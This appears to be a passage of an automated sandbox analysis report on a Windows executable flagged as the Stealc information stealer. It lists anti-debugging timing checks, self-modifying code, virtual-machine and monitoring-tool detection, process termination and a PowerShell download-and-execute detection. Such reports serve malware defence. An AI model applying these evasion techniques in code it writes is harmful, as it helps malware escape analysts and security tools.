                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383BE6 second address: 1383C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400D80DB9h 0x00000009 pushad 0x0000000a jo 00007FC400D80DA6h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383C0E second address: 1383C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388653 second address: 138865B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138865B second address: 138865F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138865F second address: 1388663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388663 second address: 1388669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388669 second address: 138866E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138866E second address: 1388674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388674 second address: 13886A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400D80DAAh 0x00000009 popad 0x0000000a jo 00007FC400D80DA8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FC400D80DA8h 0x0000001c js 00007FC400D80DAAh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13884F7 second address: 13884FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13884FB second address: 1388512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC400D80DB1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FEDA second address: 138FEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FC400504816h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FEE7 second address: 138FF03 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC400D80DA6h 0x00000008 jmp 00007FC400D80DB2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FF03 second address: 138FF0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC400504816h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FF0F second address: 138FF13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FF13 second address: 138FF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC400504827h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FF37 second address: 138FF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138EA47 second address: 138EA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138EA4D second address: 138EA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jne 00007FC400D80DA6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e jns 00007FC400D80DB7h 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007FC400D80DA6h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138EA7E second address: 138EA8B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC400504816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138EA8B second address: 138EA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F15C second address: 138F179 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC40050481Fh 0x00000008 je 00007FC400504816h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F179 second address: 138F19C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FC400D80DB7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F19C second address: 138F1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FBFD second address: 138FC0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jns 00007FC400D80DA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FC0F second address: 138FC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393DCA second address: 1393DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FC400D80DAFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393DE1 second address: 1393DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393F45 second address: 1393F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FC400D80DADh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393F5D second address: 1393F65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393F65 second address: 1393F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393F6A second address: 1393F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC400504816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393F76 second address: 1393F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393F7F second address: 1393F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393F83 second address: 1393F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A21FC second address: 13A221A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC40050481Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A221A second address: 13A221E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF368 second address: 13AF390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FC400504829h 0x0000000b popad 0x0000000c push eax 0x0000000d jnc 00007FC400504816h 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BECE8 second address: 13BECF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF267 second address: 13BF284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC400504823h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF284 second address: 13BF2A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB5h 0x00000007 je 00007FC400D80DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF2A3 second address: 13BF2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF589 second address: 13BF58F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF58F second address: 13BF593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF593 second address: 13BF5AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC400D80DA8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FC400D80DA6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5AD second address: 13BF5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5B1 second address: 13BF5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5B9 second address: 13BF5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5BF second address: 13BF5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5C3 second address: 13BF5D1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC400504816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5D1 second address: 13BF5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF84D second address: 13BF86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FC400504824h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3C29 second address: 13C3C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC400D80DB7h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007FC400D80DB5h 0x00000017 popad 0x00000018 pop ecx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push edi 0x0000001e jmp 00007FC400D80DB7h 0x00000023 pop edi 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 jo 00007FC400D80DACh 0x0000002e je 00007FC400D80DA6h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3C91 second address: 13C3C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC400504816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0499 second address: 50D049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D049D second address: 50D04A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D055F second address: 50D0563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0563 second address: 50D0569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0569 second address: 50D05A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 93h 0x0000000d jmp 00007FC400D80DB3h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push edx 0x00000019 pop esi 0x0000001a mov esi, edi 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D05A3 second address: 50D05C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504828h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, di 0x00000010 push edx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EDCB5 second address: 12EDCBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 112DA1D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12E277C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12E9A11 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132F2D7 rdtsc 0_2_0132F2D7
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-39055
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E540F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E540F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E4E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E547C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E547C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E41710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E54B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E53B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E53B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E4EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41160 GetSystemInfo,ExitProcess,0_2_00E41160
                Source: file.exe, file.exe, 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2094837133.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094837133.00000000009F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37868
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37890
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37871
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37882
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37756
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37922
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132F2D7 rdtsc 0_2_0132F2D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E44610 VirtualProtect ?,00000004,00000100,000000000_2_00E44610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E59BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59AA0 mov eax, dword ptr fs:[00000030h]0_2_00E59AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E57690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00E57690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5248, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E59790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E598E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00E598E0
                Source: file.exe, file.exe, 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: rProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E875A8 cpuid 0_2_00E875A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00E57D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E56BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00E56BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E579E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00E579E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E57BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00E57BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e40000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2053306343.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5248, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e40000.0.unpack, type: UNPACKEDPE
